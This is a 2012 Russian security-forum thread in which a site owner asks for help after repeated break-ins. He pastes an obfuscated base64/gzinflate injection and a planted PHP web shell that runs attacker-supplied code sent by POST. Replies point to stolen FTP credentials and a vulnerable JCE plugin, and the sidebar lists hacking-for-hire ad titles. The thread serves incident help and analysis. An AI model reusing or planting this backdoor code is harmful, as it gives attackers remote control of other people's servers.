CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Прошу проверить на уъязвимости мой сайт
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Тест на уязвимости RSS подписка на сообщения с форума Subscribe
Только для владельцев ресурсов - бесплатное тестирование на уязвимости

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 9992
Прошу проверить на уъязвимости мой сайт
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
lockdoc




Novice
# | Сообщение добавлено 11.07.2012 15:29:20
мой сайт alex33.ru
Постоянно кто то его ломает, вставляет след. код в файл шаблона index.php (вначале вставляли в файл index.php в корне сайта).
-------------
#c3284d#
echo(gzinflate(base64_decode("JY5BDoIwFET3Jtyh+Rt0QxOXSjmFF6jl235DW1IG0NsLspu85M1MO7kiIxS+IxsCf6DfdrEHpa469dnNkROatQj4XLfyKjaymoozFIDxpvXkcowMiMspciPQi1jvxRZuAiKptBmGHqsAXEht7XkYJHlDdkYm9a985tJzMZQ2YAfxyZDbhnchsPgAQ1dSq/QIe+pafVzp6su9OrX6+Nz9AA==")));
#/c3284d#
-----------
Помоги пожалуйста!
 
Добавлено 12.07.2012 10:24:53 (через 1 день 19 часов 56 минут 33 секунды )
 
И еще после взлома (может это был результат взлома) в корне был создан следующий файл:
.4b89.php
Вот его содержание:
------------
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
--------------------
 

 

Добавлено 13.07.2012 19:58:33 (через 1 день 10 часов 34 минуты 40 секунд )
 
Кажет, сам что то нашел, в плане безопасности.
Все атаки на мой сайт заканчивались подменой файлов через ftp-соединение.
Но только не понятно, как удавалась нападающим найти пароль на ftp доступ?
Но сейчас доступ на ftp уже ограничен. Не знаю на сколько это сдержит....
 
Добавлено 20.08.2012 00:25:55 (через 37 дней 4 часа 27 минут 22 секунды )
 
Еще кто-нить что-нить нашел в плане уъязвимостей на сайте alex33.ru?
Сказать спасибо Ответить Цитировать

superhacker




Elite
# | Сообщение добавлено 20.08.2012 00:38:49
lockdoc

как удавалась нападающим найти пароль на ftp доступ?
Как вариант ищи у себя на компе заразу.
 
Сказать спасибо Ответить Цитировать

sirko_el


Novice
# | Сообщение добавлено 25.09.2012 21:08:23
Отредактировано 25.09.2012 21:21:36 by sirko_el
У вас на сайте дырявый JCE плагин. Он подвержен XSS атаке а так же File Inclusion. Рекоммендую срочно обновить до версии 1.5.7.14 и поправить так как описано на  оффсайте плагина.
И еще обновите TinyBrowser для TinyMCE.
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Арест участников REvil взволновал других преступников
  • Обнаружена malware MoonBounce, внедряющаяся в UEFI
  • Администратор кардерского форума UniCC и участник хак-группы The ...
  • Баг в Safari приводит к утечке данных
  • В Darknet закрывается кардерский маркетплейс UniCC
  • Хакеры взломали украинские правительственные сайты
  • Уязвимость на diia.gov.ua
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » разблокировать сбер аккаунт
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}